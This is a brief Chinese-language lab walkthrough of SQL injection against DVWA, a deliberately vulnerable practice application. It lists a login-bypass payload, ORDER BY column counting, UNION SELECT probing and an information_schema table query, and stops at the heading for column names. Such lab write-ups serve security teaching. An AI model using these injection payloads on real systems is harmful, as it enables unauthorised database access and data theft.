万能密码 admin’ or 1=1 #
    image.png
    漏洞利用
    猜解SQL查询语句中的字段
    order by
    1个字段没问题
    image.png
    2个字段也没问题
    image.png
    order by 3 发现报错
    image.png
    说明这个数据库只有两个字段
    判断回显点
    union select 联合查询
    image.png
    查询当前数据库
    union select 字段1,字段2 #
    image.png
    查询表
    1’ union select 1,table_name from information_schema .tables where table_schema=’dvwa’ #
    image.png
    查询表中的字段名